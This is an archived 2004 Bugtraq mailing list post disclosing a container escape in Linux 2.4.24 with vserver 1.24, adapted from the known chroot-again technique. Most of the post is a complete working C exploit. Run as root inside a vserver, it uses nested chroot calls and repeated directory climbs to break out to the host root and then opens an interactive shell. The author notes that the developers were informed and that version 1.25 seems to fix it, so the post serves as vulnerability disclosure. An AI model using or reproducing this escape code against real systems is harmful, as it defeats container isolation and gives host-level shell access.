| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <40234909.9090401@priv.de>
Date: Fri, 06 Feb 2004 08:58:01 +0100
From: Markus Müller <unknown@...v.de>
To: bugtraq@...urityfocus.com
Subject: Linux 2.4.24 with vserver 1.24 exploit
Hi securityfocus,
a small exploit from me which brakes out of a vserver, also if secured
with "chmod 000 /vservers". It is a modification of the known
"chroot-again" exploit. It belongs to chroots but also to the vserver
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted
to the developers, and in the today released version 1.25 it seems to be
fixed.
/* vserver@...dbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */
/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */
#include <sys/types.h>
#include <sys/stat.h>
main()
{
int i;
if (chdir("/") != 0) {
perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
perror("mkdir baz");
}
if (chroot("baz") != 0) {
perror("chroot baz"); exit(1);
}
for (i=0; i<50; i++) {
if (chdir("..") != 0) {
perror("cd .."); /* exit(1); */
}
if (chmod("..", S_IXOTH) != 0) {
perror("chmod"); /* exit(1); */
}
}
if (chroot(".") != 0) {
perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}
The developers have been noticed.
Greetings,
Markus Müller
GeNUA mbH
Powered by blists - more mailing lists